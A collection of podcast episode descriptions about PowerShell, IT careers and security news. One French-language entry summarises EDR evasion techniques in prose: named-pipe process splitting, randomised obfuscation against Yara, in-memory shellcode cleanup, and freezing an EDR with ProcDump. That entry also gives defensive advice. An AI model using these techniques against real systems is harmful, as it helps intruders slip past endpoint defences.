Podcasts about PowerShell

On this episode, I go into several stories related to criticism of European Commission regulations, various security related stories, upcoming enhancements for PowerShell and much more! Reference Links: https://www.rorymon.com/blog/criticisms-of-eu-regulations-increase-new-script-library-feature-for-defender-it-nightmare-story/

In this episode of The PowerShell Podcast, Andrew Pla is joined by Tara, a longtime IT professional who has officially started her PowerShell learning journey. Tara shares her honest experience transitioning from a GUI-first mindset to learning PowerShell fundamentals, including objects, verb-noun commands, variables, pipelines, and error messages. The conversation captures the real emotions of learning something new later in a career—confusion, frustration, breakthroughs, and growing confidence. The episode also explores learning strategies like daily practice, flashcards, typing commands instead of copying, and asking “beginner” questions without fear. Andrew and Tara emphasize the importance of community, mentorship, growth mindset, and psychological safety, encouraging listeners that learning PowerShell doesn't require perfection—just consistency, curiosity, and support. Key Takeaways: Learning PowerShell deepens your understanding of IT as a whole, not just scripting, especially through concepts like objects, properties, and methods. Consistency beats intensity — small daily practice, repetition, and typing commands manually build real confidence over time. Community changes everything — asking questions, sharing struggles, and learning publicly makes progress faster and far more enjoyable. Guest Bio: Tara Sinquefield is an experienced IT professional and PDQ team member who is publicly documenting her PowerShell learning journey. Known for her honesty, curiosity, and willingness to ask the questions others may be afraid to ask, Tara represents the many IT pros who are discovering PowerShell later in their careers. Her journey highlights how learning fundamentals can unlock deeper technical understanding, confidence, and new opportunities. She is also a host of PDQ Live every week Resource Links: PDQ Discord – https://discord.gg/PDQ Tara's LinkedIn - https://www.linkedin.com/in/tara-sinquefield-894a1a215/ Connect with Andrew - https://andrewpla.tech/links Tara Writes Her First Script: https://www.youtube.com/watch?v=Oa0GYX9_vj8 PowerShell Conference Europe – https://psconf.eu PowerShell + DevOps Global Summit – https://powershellsummit.org The PowerShell Podcast on YouTube: https://youtu.be/ZaPoS4mGW7s  

Join Kristian McCann from UC Today and Kevin Kieller from Enable UC as they kick off February 2026 with an in-depth look at Microsoft Teams' latest security enhancements and market momentum. Special guest Oleg Danyliuk, CEO of Duanex, shares his company's five-year journey dual-licensing Slack and Teams—and why Teams is finally winning him over.This month's topics:

Show NotesGA: Code apps by Jordan ChodakAdd your Dataverse tables to your Code App by Charles SextonWe built a Power App with ONE AI Prompt by Charles Sexton and Josh GilesPower Apps with Liquid Glass by Ryan JohnstonCreating Dynamic Cascading Dropdowns With Related Entities by Megan V. WalkerReimagine Human and Agent Collaboration with Elaiza Benitez and Claudio RomanoCopy an agent to Copilot StudioPower Pages Client API (Preview) by Neeraj NandwanaEmbedding WebChat by Adi LeibowitCheck your Power Platform solutions for secrets with Pester and PowerShell by Leo VisserBreaking down the facts about secure development with Power Platform by Joe Unwin and Justin TungChris Huntingford on Agents and Frontier Firms by Victor Dantas Import solutions from a pipelines hostThe 6 pillars that will define agent readiness in 2026 by Nitasha ChopraExplaining AI Skills by Scott Hanselmanmicrosoft/skillsDamoBird365 by Damien BirdBe sure to subscribe so you don't miss a single episode of Power Platform BOOST!Thank you for buying us a coffee: buymeacoffee.comPodcast home page: https://powerplatformboost.comEmail: hello@powerplatformboost.comFollow us!Twitter: https://twitter.com/powerplatboost Instagram: https://www.instagram.com/powerplatformboost/ LinkedIn: https://www.linkedin.com/company/powerplatboost/ Facebook: https://www.facebook.com/profile.php?id=100090444536122 Mastodon: https://mastodon.social/@powerplatboost

Agents will soon retrieve data from MCP servers and offer formatting options you can interact with. The Copilot "preview pane" opens Word, Excel, and PowerPoint alongside your M365 Chat results. Viva Engage introduces a way to hide your colleagues messages from your feed. What else landed this week? 0:00 Welcome 1:55 Open Word, Excel, and PowerPoint Files in Microsoft 365 Copilot Chat - MC1225199 4:03 Microsoft Teams: Teams Live Events is retiring - MC1226495 8:17 Enhancing Model Context Protocol (MCP) based agents with rich interactive UI widgets support - MC1227627 14:00 Viva Engage: New option to hide a user's messages - MC1226225 21:11 Drawn electronic signatures with eSignature for Microsoft 365 - MC1225195 24:09 Change meeting organizer via PowerShell cmdlet in Exchange Online - MC1227623

Microsoft MVP Harm Veenstra, creator of PowerShellIsFun.com, joins The PowerShell Podcast to talk about productivity, consistency, and why PowerShell really is fun. Harm shares how blogging regularly helped accelerate his learning, improve his workflow, and deepen his connection to the community. He also discusses his recent transition to macOS, how he uses PowerShell across Mac, Linux, and Windows, and why modern PowerShell is far more cross-platform than many people realize. The conversation dives into VS Code extensions, GitHub Codespaces, WSL, Nerdfonts, and practical terminal setups, along with honest thoughts on AI-generated scripts, learning the hard way, and why asking questions publicly is one of the fastest paths to growth. Key Takeaways: Consistency beats perfection – Having a repeatable workflow for writing, scripting, or learning makes long-term progress almost automatic. PowerShell is truly cross-platform – Running PowerShell on macOS, Linux, WSL, and containers unlocks powerful workflows beyond Windows-only thinking. Community accelerates everything – Asking questions, sharing small discoveries, and contributing publicly leads to faster learning, confidence, and career growth. Guest Bio: Harm Veenstra is a Microsoft MVP, consultant, blogger, and community contributor best known for PowerShellIsFun.com, where he publishes frequent, practical PowerShell content. He is an active participant in the PowerShell community and a regular conference attendee and speaker. Resource Links: PowerShell Is Fun – https://powershellisfun.com Connect with Andrew - https://andrewpla.tech/links Install Nerdfonts with PowerShell – https://powershellisfun.com/2026/01/30/install-nerdfonts-using-powershell/ GitHub Codespaces – https://github.com/features/codespaces PowerShell Conference Europe – https://psconf.eu PDQ Discord – https://discord.gg/PDQ Fred's Module Building PS Wednesday – https://www.youtube.com/watch?v=ZAjtbZktL8w The PowerShell Podcast on YouTube: https://youtu.be/V6kWnmrHOms

Recently retired PowerShell icon Don Jones joins The PowerShell Podcast for a wide-ranging conversation on career ownership, community leadership, and building a life that aligns with what you actually value. Don reflects on the difference between your job and your career, why investing in yourself pays off, and how asking better questions can change the way you influence decisions at work. The episode also dives into Don's journey as a fiction author, his role in shaping the PowerShell community and Summit culture, and why real success comes from clarity, kindness, and helping others win.   Key Takeaways: • Your employer owns your job, but you own your career—define your destination and build the skills to get there. • Strong careers are built on outcomes, not tools—focus on saving time, reducing errors, and delivering measurable business value. • Community scales when you empower others—create space for people to contribute, own wins, and multiply the impact beyond yourself.   Guest Bio: Don Jones is a foundational figure in the PowerShell community, known for his decades of teaching, writing, and advocacy for automation and professional growth. A former Microsoft MVP, Don co-authored the widely influential Learn PowerShell in a Month of Lunches series and helped shape community culture through conferences, mentorship, and leadership. Now retired from full-time work, Don continues writing and publishing fiction, bringing the same clarity and craft to storytelling that made his technical teaching so impactful.   Resource Links: • Don Jones Website and Books – https://donjones.com Andrew's links: https://andrewpla.tech/links • PowerShell + DevOps Global Summit – https://powershellsummit.org • Tech Impact (nonprofit mentioned) – https://techimpact.org • PowerShell.org – https://powershell.org • PDQ Discord – https://discord.gg/PDQ • PowerShell Wednesdays – https://www.youtube.com/results?search_query=PowerShell+Wednesdays The PowerShell Podcast on YouTube: https://youtu.be/xKh8rqCqMQg  

After two months of accumulated Qs, we felt we still had plenty of As to dispense, so we're wheeling back around to a supplemental questions episode this week, touching on such topics as generating negative mileage in an EV, what the iOS low battery mode actually does, tiny network racks for your desk, a shocking amount of discussion about shells like zsh, fish, PowerShell and Nushell, the whereabouts of Intel's successor to the Alder Lake-N... and, for that matter, why (nearly) everything at Intel is a Lake.The Voyager documentary It's Quieter in the Twilight: https://www.youtube.com/watch?v=RIP1p5gAoak Support the Pod! Contribute to the Tech Pod Patreon and get access to our booming Discord, a monthly bonus episode, your name in the credits, and other great benefits! You can support the show at: https://patreon.com/techpod

Business Process Automation has been around a long time - what are the latest approaches? Richard talks to Ian Cooper about his work building BPA workflows in organizations - starting on paper or a whiteboard to make sense of the process before bringing tools into the equation. Ian talks about building repeatable workflows that are well-documented and source-controlled, typically through GitHub. As workflows get more complex, you'll need orchestration engines that can handle failures and provide telemetry to identify when and where things go wrong. And make sure you let users know how things are going - or they will worry! LinksKafkaDurable FunctionsGitHub ActionsTemporalPulumiOpenTelemetryRecorded December 5, 2025

Microsoft Defender is often treated as “good enough” security—built in, always on, and quietly doing its job. But what happens when malware convinces Windows to turn it off without triggering alarms?In this episode, cybersecurity expert Tyler Mofitt breaks down a real-world Windows malware campaign that disables Defender before anything else happens. No zero-days. No flashy exploits. Just a quiet abuse of built-in trust that causes Windows to step aside its own protection.He walks through how shortcut files, PowerShell, and legitimate cloud services are used to blend into normal activity, why Defender doesn't fail so much as follow the rules, and what defenders should be watching for when “installed” doesn't always mean “active.”A conversation about assumptions, visibility, and why the most dangerous attacks don't look dangerous at all.Link mentioned in the episode -  threat intel hub with all the latest trends and stories going on with threat intelligence.https://community.opentextcybersecurity.com/As featured on Million Podcasts' Best 100 Cybersecurity Podcasts Top 50 Chief Information Security Officer CISO Podcasts Top 70 Security Hacking Podcasts This list is the most comprehensive ranking of Cyber Security Podcasts online and we are honoured to feature amongst the best! Follow or subscribe to the show on your preferred podcast platform.Share the show with others in the cybersecurity world.Get in touch via reimaginingcyber@gmail.com

Newly minted Microsoft MVP David Sass joins The PowerShell Podcast to talk about PowerShell notebooks, terminal tooling, and making automation approachable for teams that are hesitant to touch the console. David shares how he uses Jupyter/PowerShell notebooks as a practical “click-to-run” interface for colleagues, helping them safely run approved automation while keeping the logic documented, repeatable, and under source control. The conversation also dives into incident response automation, David's journey from SharePoint engineering into security, and the surprising ways PowerShell can be used across Windows, cloud, and even Raspberry Pi lab clusters—while still staying focused on knowledge-sharing and building systems that don't depend on one person.   Key Takeaways: • Notebooks can remove friction for teams — combining documentation, code, and saved output creates a safer way for others to run automation without needing deep PowerShell confidence.David Sass Podcast • PowerShell scales incident response workflows — David explains how notebooks can log in, pull incidents, enrich data, and even auto-close noise, reducing UI-click fatigue for analysts.David Sass Podcast • Teaching makes you promotable — sharing knowledge reduces dependency on you, strengthens the team, and makes it easier for a business to grow your role without risk.   Guest Bio: David is a Microsoft MVP and highly skilled SharePoint Guy who is focusing on Automation, Compliance, Security, Operational Excellence, Quality Assurance and hacking the unexpected out from the technology stack.   Resource Links: David's link hub – https://davidsass.io/ Andrew's links - https://andrewpla.tech/links PowerShell Spectre Console – https://pwshspectreconsole.com/ PowerShell Wednesdays – https://www.youtube.com/results?search_query=PowerShell+Wednesdays PDQ Discord – https://discord.gg/PDQ ClockworkPi (the handheld device shown/discussed) – https://clockworkpi.com The PowerShell Podcast on YouTube: https://youtu.be/Y03EJYpZczo

Today we are joined by Ben Folland, Security Operations Analyst from Huntress, discussing their work on "ClickFix Gets Creative: Malware Buried in Images." This analysis covers a ClickFix campaign that uses fake human verification checks and a realistic Windows Update screen to trick users into manually running malicious commands. The multi-stage attack chain leverages mshta.exe, PowerShell, and .NET loaders, ultimately delivering infostealers like LummaC2 and Rhadamanthys, with payloads hidden inside PNG images using steganography. While technically sophisticated, the campaign hinges on simple user interaction, underscoring the importance of user awareness and controls around command execution. The research can be found here: ClickFix Gets Creative: Malware Buried in Images Learn more about your ad choices. Visit megaphone.fm/adchoices

Today we are joined by Ben Folland, Security Operations Analyst from Huntress, discussing their work on "ClickFix Gets Creative: Malware Buried in Images." This analysis covers a ClickFix campaign that uses fake human verification checks and a realistic Windows Update screen to trick users into manually running malicious commands. The multi-stage attack chain leverages mshta.exe, PowerShell, and .NET loaders, ultimately delivering infostealers like LummaC2 and Rhadamanthys, with payloads hidden inside PNG images using steganography. While technically sophisticated, the campaign hinges on simple user interaction, underscoring the importance of user awareness and controls around command execution. The research can be found here: ClickFix Gets Creative: Malware Buried in Images Learn more about your ad choices. Visit megaphone.fm/adchoices

professorjrod@gmail.comIn this episode of Technology Tap: CompTIA Study Guide, we explore how proactive detection surpasses reactive troubleshooting in cybersecurity. For those preparing for their CompTIA exam, understanding the subtle clues and quiet anomalies attackers leave behind is essential for developing strong IT skills and excelling in tech exam prep. We dive deep into the critical indicators that help you detect security compromises early, providing practical knowledge essential for your technology education and IT certification journey. Join us as we equip you with expert insights to sharpen your detection abilities and enhance your competence in protecting systems effectively.We walk through the behaviors that matter: viruses that hitch a ride on clicks, worms that paint the network with unexplained traffic, and fileless attacks that live in memory and borrow admin tools like PowerShell and scheduled tasks. You'll learn how to spot spyware by the aftermath of credential misuse, recognize RATs and backdoors by their steady beaconing to unknown IPs, and use contradictions—like tools disagreeing about running processes—as a signal for rootkits. We also draw a sharp line between ransomware's loud chaos and cryptojacking's quiet drain on your CPU and fan.Zooming out, we map network and application signals: certificate warnings and duplicate MACs that hint at man-in-the-middle, DNS mismatches that suggest cache poisoning, and log patterns that betray SQL injection, replay abuse, or directory traversal. Along the way, we talk about building Security+ instincts through scaffolding—A+ for OS and hardware intuition, Network+ for protocol fluency, and Security+ for attacker behavior—so indicators make sense the moment you see them.If you want a sharper eye for subtle threats and a stronger shot at your Security+ exam, this guide will train your attention on the tells adversaries can't fully hide. Subscribe, share with a teammate who handles triage, and leave a review with your favorite indicator to watch—we'll feature the best ones in a future show.Support the showArt By Sarah/DesmondMusic by Joakim KarudLittle chacha ProductionsJuan Rodriguez can be reached atTikTok @ProfessorJrodProfessorJRod@gmail.com@Prof_JRodInstagram ProfessorJRod

Matthew Gill joins The PowerShell Podcast to talk about what it means to be a Site Reliability Engineer (SRE) and how SRE thinking changes the way you approach automation, reliability, and problem solving. Matthew and host Andrew Pla break down core concepts like SLAs, SLOs, and SLIs, and why reliability through planning matters more than rushing straight to the keyboard.   They also dig into why PSFramework is worth the dependency for enterprise-grade logging and configuration, how community mentorship (including Fred Weinmann's impact) can fast-track growth, and why books like The Phoenix Project are game-changing for understanding DevOps culture and constraints.   Key Takeaways: • SRE is software engineering applied to operations — focus on measurable reliability, proper planning, and balancing change with stability using concepts like SLAs, SLOs, and SLIs. • PSFramework can eliminate “reinventing the wheel” — especially for logging and configuration handling, giving enterprises proven patterns and integrations without custom-built fragility. • Community is a career multiplier — mentorship, learning in public, and teaching others are some of the fastest ways to build confidence and advance your PowerShell journey.   Guest Bio: Matthew Gill is a Site Reliability Engineer and is the Co-Director of Content for the PowerShell + DevOps Global Summit. He has been a problem solver, systems administrator, and scripter for nearly 20 years. From working in the United States Marine Corps, education, radio, and currently the private sector, the majority of Matt's experience has been focused on solving problems in a variety of interesting and creative ways.Resource Links PowerShell + DevOps Global Summit – https://powershellsummit.org The Phoenix Project (Book) – https://itrevolution.com/product/the-phoenix-project/ The Unicorn Project (Book) – https://itrevolution.com/product/the-unicorn-project/ PSFramework – https://github.com/PowershellFrameworkCollective/psframework Matthew Gill's Blog – https://therealgill.com Andrew's Links - https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/results?search_query=PowerShell+Wednesdays The PowerShell Podcast on YouTube: https://youtu.be/vkOLsjsPvYo

AI tools continue to evolve - what can we do with them today? Richard chats with Cecilia Wirén about her experiences using the latest AI tools to support DevOps workflows, diagnostics, and the crafting of new scripts. Cecilia focuses on tools that can help admins who occasionally work on scripts, including getting into a GitHub workflow to track prompts and results generated by LLMs, so you can always revert and learn from various approaches to interact with these new tools. The tools continue to evolve; it's worth looking at the latest features and models!LinksAzure SRE AgentMicrosoft Security CopilotGitHub CopilotAwesome CopilotCopilot ExtensionsRecorded December 3, 2025

Parce que… c'est l'épisode 0x692! Shameless plug 25 et 26 février 2026 - SéQCure 2026 CfP 31 mars au 2 avril 2026 - Forum INCYBER - Europe 2026 14 au 17 avril 2026 - Botconf 2026 28 et 29 avril 2026 - Cybereco Cyberconférence 2026 9 au 17 mai 2026 - NorthSec 2026 3 au 5 juin 2026 - SSTIC 2026 19 septembre 2026 - Bsides Montréal Description Introduction Ce deuxième épisode du podcast technique avec Charles F. Hamilton explore en profondeur les techniques d'évasion des solutions EDR (Endpoint Detection and Response) et les stratégies que les red teamers peuvent utiliser pour contourner ces systèmes de détection. La discussion révèle que malgré les avancées technologiques, les EDR restent vulnérables à des techniques relativement simples lorsqu'on comprend leurs mécanismes de détection. Les limites de la détection EDR Corrélation réseau et named pipes Un exemple concret illustre les faiblesses des EDR modernes : un exécutable malveillant qui communique avec internet tout en effectuant de la reconnaissance sur le réseau interne. Les EDR “top tier” détectent généralement cette activité anormale grâce au machine learning, identifiant qu'un processus communique simultanément vers l'extérieur et vers le réseau local via SMB, Kerberos ou d'autres protocoles. La solution de contournement est élégante : utiliser les named pipes de Windows. Cette fonctionnalité native permet la communication inter-processus. En séparant les tâches entre deux processus indépendants - l'un gérant les communications externes, l'autre la reconnaissance interne - et en les faisant communiquer via named pipes, on brise complètement la chaîne de détection du machine learning. Cette technique, enseignée depuis 8 ans dans les formations red team, demeure efficace. Des signatures déguisées Paradoxalement, malgré leurs prétentions, les EDR fonctionnent encore largement sur des principes de signatures. La différence avec les antivirus traditionnels réside davantage dans où ils appliquent cette détection - non seulement sur le disque, mais aussi en mémoire et au niveau comportemental. Le compromis entre faux positifs et détection reste délicat : générer 1500 alertes par jour conduirait à l'“alert fatigue” et rendrait le système inutile. Techniques d'obfuscation et d'évasion La randomisation intelligente Pour éviter la détection statique, l'obfuscation doit être réfléchie. Un piège courant : générer des variables aléatoires de longueur fixe (par exemple, toujours 16 caractères). Les règles Yara peuvent détecter ce pattern. La solution consiste à introduire de la randomness dans le random : utiliser des longueurs variables (entre 6 et 22 caractères) et concaténer plusieurs mots du dictionnaire plutôt que des chaînes purement aléatoires. Nettoyage de la mémoire L'obfuscation ne s'arrête pas à l'exécution. Même après déchiffrement en mémoire, des artefacts subsistent. Par exemple, Cobalt Strike laisse des patterns reconnaissables dans les premiers bytes du shellcode. La stratégie recommandée utilise plusieurs threads d'exécution : un pour déchiffrer et lancer le shellcode, un autre pour nettoyer la mémoire des variables intermédiaires. Bien que les EDR ne scannent pas la mémoire en continu (ce serait trop coûteux en performance), ces artefacts restent détectables. Protection au niveau kernel Protected Process Light (PPL) Microsoft a introduit les PPL pour protéger les processus critiques comme LSASS. Même avec des privilèges système, un attaquant ne peut accéder à ces processus. Le problème : le kernel reste le point de confiance ultime. Une fois qu'un attaquant obtient l'exécution de code au niveau kernel - via des drivers vulnérables par exemple - toutes les protections PPL tombent. Techniques d'anti-tampering La technique “EDR Freeze” illustre cette réalité : en utilisant ProcDump (un outil Windows légitime), on peut créer un dump mémoire d'un processus EDR, ce qui le met en pause. En arrêtant ensuite ProcDump avant qu'il ne termine, le processus EDR reste indéfiniment en pause, sans générer d'alerte de tampering puisqu'il n'a pas été modifié. Cloud et nouvelles vulnérabilités Le passage au cloud déplace simplement les problèmes. Les attaques traditionnelles visaient le “domain admin” en local ; aujourd'hui, avec l'authentification multifacteur, les attaquants utilisent le device code phishing ou des applications tierces malveillantes pour obtenir des tokens OAuth valides. Une fois ces tokens obtenus, l'escalade vers “global admin” devient possible. La difficulté : aucun EDR ne peut surveiller ces attaques puisqu'elles se déroulent depuis la machine de l'attaquant. La seule visibilité provient de ce que Microsoft accepte de partager, souvent derrière des paywalls supplémentaires. Les entreprises ont passé 20 ans à maîtriser Active Directory et les outils de sécurité on-premise, mais repartent de zéro dans le cloud avec des outils immatures. Recommandations défensives Configurations simples mais efficaces Plusieurs mesures basiques restent sous-utilisées : Bloquer PowerShell pour les utilisateurs non techniques Désactiver la fonction Run (Windows+R) pour 99% des utilisateurs Supprimer MSHTA.exe via GPO (aucun besoin légitime des fichiers HTA) Restreindre les scripts Office par défaut Ces mesures élimineraient la majorité des attaques “commodity malware” qui fonctionnent uniquement parce que les entreprises n'ont pas fermé ces vecteurs d'accès basiques. Le facteur humain irremplaçable Les EDR excellent contre le malware de masse mais peinent face aux attaques ciblées. L'IA et les agents ne remplaceront pas les analystes humains capables de : Faire du threat hunting actif Contextualiser les alertes (pourquoi un utilisateur non technique lancerait-il PowerShell ?) Détecter les anomalies dans le trafic réseau (nouveaux domaines, patterns de requêtes POST répétitives) Raconter l'histoire complète d'une intrusion en corrélant les événements Détection réseau Les NDR/XDR commencent à combler cette lacune, mais restent embryonnaires. La détection réseau devrait identifier : Les nouveaux domaines jamais vus auparavant Les patterns de communication C2 (requêtes POST régulières avec jitter) Les anomalies d'authentification Le trafic inhabituel pour un profil utilisateur donné Conclusion La sophistication des attaquants reste limitée car ils n'en ont pas encore besoin - trop d'environnements demeurent mal configurés. Les entreprises investissent massivement dans les EDR mais négligent les configurations de base et le facteur humain. L'histoire se répète avec le cloud et l'IA : plutôt que de résoudre les problèmes fondamentaux, on déplace la responsabilité vers de nouveaux outils. La vraie sécurité nécessite une compréhension technique approfondie, des configurations rigoureuses, et surtout, des analystes compétents pour interpréter les signaux et raconter l'histoire des incidents. Collaborateurs Nicolas-Loïc Fortin Charles F. Hamilton Crédits Montage par Intrasecure inc Locaux virtuels par Riverside.fm

Distinguished Software Engineer Ryan Spletzer joins The PowerShell Podcast to talk about building a long-term career in tech through curiosity, continuous learning, and strong community connections. Ryan shares how PowerShell helped shape his path from early work in SharePoint, automation, and identity management to leading AI initiatives at Autodesk, where his team built an internal ChatGPT-style solution using Azure OpenAI before enterprise ChatGPT options existed. They also dig into AI-assisted coding, mentorship, and how foundational software engineering skills still matter more than ever. Ryan offers practical guidance for using AI tools responsibly, overcoming imposter syndrome, and growing by learning adjacent domains like authentication, networking, and data engineering.   Key Takeaways: • AI is a force multiplier for experienced engineers, but mentorship is critical to help early-career engineers learn how to ask the right questions and avoid “blind troubleshooting.” • Breadth matters as you level up. Understanding adjacent domains and collaborating well with others becomes a key differentiator at senior and staff levels. • PowerShell remains a career accelerator. Ryan explains how PowerShell led him into infrastructure automation, identity, and modern auth—and why it's still his go-to tool for quick, high-impact scripting today.   Guest Bio: Ryan Spletzer is a Distinguished Software Engineer at Autodesk, where he works in an internal organization focused on AI, data, and automation. With a background spanning SharePoint development, .NET engineering, identity systems, and enterprise automation, Ryan has spent years building tools that scale across organizations. He's also a strong advocate for continuous learning and mentorship.   Resource Links: Ryan links - https://www.spletzer.com/about/ Ryan's blog - https://www.spletzer.com/ Andrew's links - https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/playlist?list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B The PowerShell Podcast on YouTube: https://youtu.be/ryZ7OdvCNZo

Jorge Suarez joins The PowerShell Podcast to share his journey into PowerShell, automation, and community contribution. From attending his first MMS conference to building creative and practical PowerShell projects, Jorge talks about how PowerShell became the primary driver of his career growth. The conversation covers his popular Intune Hydration Kit, creative TUI projects inspired by shows like Severance, and how curiosity and experimentation led him to build tools he wished existed earlier in his career.   Beyond tooling, Jorge opens up about imposter syndrome, learning in public, and using PowerShell as a force multiplier to automate work, stand out professionally, and think differently about problem solving.   Key Takeaways: PowerShell accelerates careers – Automating repetitive work and forcing yourself to use PowerShell daily builds fluency and opens new opportunities. Build what you wish you had – Jorge's projects, including Intune Hydration Kit and multiple TUI tools, came from solving his own real-world problems. Imposter syndrome is fuel – When managed well, it can drive curiosity, learning, and long-term growth instead of holding you back. Guest Bio: Jorge Suarez is an Endpoint Platform Engineer and PowerShell enthusiast. Jorge is known for building creative PowerShell solutions—including terminal user interfaces and Intune automation projects. He's an active community contributor who blogs, shares code on GitHub, and advocates for learning in public.   Resource Links: Jorge Suarez on GitHub – https://github.com/jorgeasaurus Jorge's Blog – https://www.jorgeasaur.us/ Intune Hydration Kit – https://github.com/jorgeasaurus/IntuneHydrationKit Connect with Andrew - https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/results?search_query=PowerShell+Wednesdays The PowerShell Podcast on YouTube: https://youtu.be/NEDX_3kDhZQ

PowerShell legend Jeff Hicks joins The PowerShell Podcast to talk about what it really means to live in PowerShell every day. From running his entire workflow in the console to building highly polished terminal tools, Jeff shares how PowerShell can be used far beyond infrastructure management—to organize your day, automate personal tasks, and multiply productivity. The conversation also dives deep into learning PowerShell long-term, embracing small wins, investing in your own career growth, and making yourself “available to luck.” Jeff introduces his newest project, PSIntro, designed to help absolute beginners get started with PowerShell through interactive, localized tutorials and a welcoming splash experience.   Key Takeaways: PowerShell fluency comes from time and repetition, not talent. Use it daily, even for small personal tasks, and progress will follow. PowerShell is a force multiplier. Thoughtful use of color, terminal UIs, verbose output, and helper functions can dramatically improve productivity. Investing in your own learning outside of work gives you career freedom. Your job is not your career—your skills are. Guest Bio: Jeff Hicks is a PowerShell author, educator, and community icon with nearly two decades of experience teaching automation to IT professionals. A long-time Microsoft MVP, Jeff has written multiple books, created countless tools and modules, and spoken at conferences around the world. Known for his practical approach and passion for teaching, Jeff continues to shape how people learn, use, and think about PowerShell.   Resource Links: Jeff Links - https://jdhitsolutions.github.io/ PSIntro Project – https://github.com/jdhitsolutions/PSIntro Spectre.Console for PowerShell – https://pwshspectreconsole.com/ PowerShell Summit – https://powershellsummit.org PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/watch?v=ztKT2wK6EW4&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&pp=gAQB The PowerShell Podcast on YouTube: https://youtu.be/lKKfmdDtBOU

In this episode, Todd and Jon discuss the latest AI agreements, updates to the Apple ecosystem (OS 26.2), and the history of PowerShell. The core discussion focuses on the "overcomplication issue" facing tech enthusiasts and offers hardware and software tips to simplify daily workflows. AI & Industry News Disney & OpenAI: The Walt Disney Company has reached an agreement to license characters to OpenAI's Sora. Google Labs: Todd joined the waitlist for "Google Disco," a tool that uses "GenTabs" to create interactive web apps and complete tasks using natural language without coding. Visual Podcasting: Todd discussed using "Nano Banana Pro" and Gemini to create visual whiteboard summaries for podcast notes. Apple OS 26.2 Updates watchOS 26.2: Features updates to Sleep Scores, which Jon notes can feel "judgmental" regarding sleep quality. iPadOS 26.2: Reintroduces multitasking features like slide over and enables "Auto Chapters" for podcasts. macOS 26.2: Introduces "Edge Light" (a virtual ring light for video calls) and "low latency clusters" for local AI development on M5 Macs. Tech History PowerShell Origins: Jeffrey Snover, creator of PowerShell, revealed in a blog post that "cmdlets" were originally named "Function Units" (FUs), reflecting the "Unix smart-ass culture" of the era. Discussion: Simplifying the Tech Stack The hosts discuss the tendency to overcomplicate setups, such as using Docker for RSS feeds or complex SSO for home use. They recommend the following simplifications: Hardware KableCARD: A credit-card-sized kit containing multiple adapters, a light, and a phone stand to replace carrying multiple cables. Presentation Remotes: Use a simple dedicated remote ($20–$30) or repurpose a Surface Pen via Bluetooth instead of relying on complex software solutions. Software Pythonista (iOS/macOS): Run simple local scripts (e.g., GPA calculators) rather than paying for dedicated subscription apps. Homebridge: A lighter-weight alternative to Home Assistant for connecting IoT devices (like Sonos) to Apple HomeKit. Troubleshooting Tip Pixel Tablet YouTube Glitch: If the YouTube app on the Pixel Tablet displays unusable, giant thumbnails, the fix is to clear both the app's cache and storage/memory.

Hunting for SharePoint In-Memory ToolShell Payloads A walk-through showing how to analyze ToolShell payloads, starting with acquiring packets all the way to decoding embedded PowerShell commands. https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Hunting%20for%20SharePoint%20In-Memory%20ToolShell%20Payloads/32524 Android Security Bulletin December 2025 Google fixed numerous vulnerabilities with its December Android update. Two of these vulnerabilities are already being exploited. https://source.android.com/docs/security/bulletin/2025-12-01 4.3 Million Browsers Infected: Inside ShadyPanda's 7-Year Malware Campaign A group or individual released several browser extensions that worked fine for years until an update injected malicious code into the extension https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign

Newly minted Microsoft MVP, pentester, and returning guest Spencer Alessi joins The PowerShell Podcast to talk about growth, giving back, and building security through PowerShell. Spencer shares lessons from his journey from sysadmin to pen tester, including the importance of learning from mistakes, documenting wins, and advocating for yourself in your career. He also introduces his latest open-source project, AppLocker Inspector, and discusses tools like Locksmith, Pink Castle, and Purple Knight that help IT pros secure their environments and build confidence in automation and defense.   Key Takeaways: Grow through mistakes – Learn from both your own missteps and those of others; every lesson strengthens your technical and professional skills. Security tools for sysadmins – Free PowerShell-based tools like AppLocker Inspector, Locksmith, and Purple Knight offer practical wins for securing Active Directory. Advocate for yourself and give back – Track your wins, share your work, and pay forward the mentorship and generosity that helped you grow. Guest Bio: Spencer Alessi is a Microsoft MVP, penetration tester, and community educator passionate about helping sysadmins strengthen their environments. Known online as @TechSpence, he creates approachable content and tools focused on helping sysadmins o improve security. Spencer is also a podcast host, public speaker, and strong advocate for mentorship, authenticity, and continuous learning in tech.   Resource Links: Spencer on PDQ Live - https://www.youtube.com/watch?v=j33dN2bELPU AppLocker Inspector – https://github.com/techspence/AppLockerInspector Purple Knight – https://www.semperis.com/purple-knight/ Ping Castle – https://www.pingcastle.com/download/ Locksmith (ADCS Auditing Tool) – https://github.com/jakehildreth/locksmith ADeleginator – https://github.com/techspence/ADeleginator Spencer's Links – https://links.spenceralessi.com Cyber Threat Perspective Podcast – https://offsec.blog Connect with Andrew - https://andrewpla.tech/links PDQ Discord – https://discord.gg/PDQ PowerShell Wednesdays – https://www.youtube.com/watch?v=lPoc8X7t0hY&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&pp=0gcJCbAEOCosWNin The PowerShell Podcast on YouTube: https://youtu.be/E4ji0-rmsuA

The EPA approved two new PFAS-containing pesticides for food crops and plans four more. Scientists warn this deliberately increases dietaryexposure to persistent chemicals linked to cancer and birth defects.A magician who implanted an RFID chip in his hand for stage tricks forgot the password and is now permanently locked out of the device inside his own body. Perhaps he should have had the password tattooed backwards on his forehead.A fired Ohio contractor plead guilty to resetting 2,500 coworker passwords via PowerShell, paralyzing the company and causing $862,000 in damages. We're thinking this will keep him fired for quite a whileMI5 warns MPs that Chinese state agents are aggressively targeting lawmakers and staff through fake recruiter profiles on LinkedIn to cultivate intelligence sources. LinkedIn is not the friend it once was.NordPass data confirms Gen Z now chooses weaker passwords than 80-year-olds, proving every generation remains terrible at basic security hygiene. Wait… Your password is worse than your grand mothers? Please subscribe to this podcastProminent cryptographer accuses NSA of rigging IETF process to force adoption of deliberately weakened post-quantum encryption standards despite community objections. That could explain some of the very trivial 